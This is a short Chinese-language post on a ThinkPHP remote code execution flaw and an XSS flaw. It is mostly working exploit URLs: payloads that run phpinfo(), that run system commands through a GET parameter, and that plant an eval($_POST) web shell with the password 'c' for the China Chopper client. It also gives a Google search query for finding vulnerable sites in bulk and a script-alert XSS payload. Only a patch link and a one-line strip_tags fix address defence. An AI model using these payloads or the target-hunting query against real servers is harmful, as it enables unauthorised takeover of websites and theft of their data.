文章浏览 复制本页面地址

THINKPHP 任意执行漏洞以及跨站脚本攻击

最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:

index.php/module/aciton/param1/${@print(THINK_VERSION)}

index.php/module/aciton/param1/${@function_all()}
其中function_all代表任何函数,比如:

index.php/module/aciton/param1/${@phpinfo()}
获取服务器的系统配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
列出网站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}
直接执行一句话代码,用菜刀直接连接.
黑阔可以直接通过google批量搜索关键字:thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。

http://site.com/index.php/module/action/param1/${@phpinfo()}

直接拿SHELL

index.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c

修复:

http://thinkphp.cn/down-116.html  下载补丁

XSS攻击 :

http://aa.com/index.php/module/action/param1/"><script>alert(1)</script>

修复方法:

修改: ThinkPHP/Tpl/ThinkException.tpl.php

第57行 echo($_SERVER['PHP_SELF'])
改为 echo strip_tags($_SERVER['PHP_SELF'])

 

 

标签:
上一篇:
下一篇: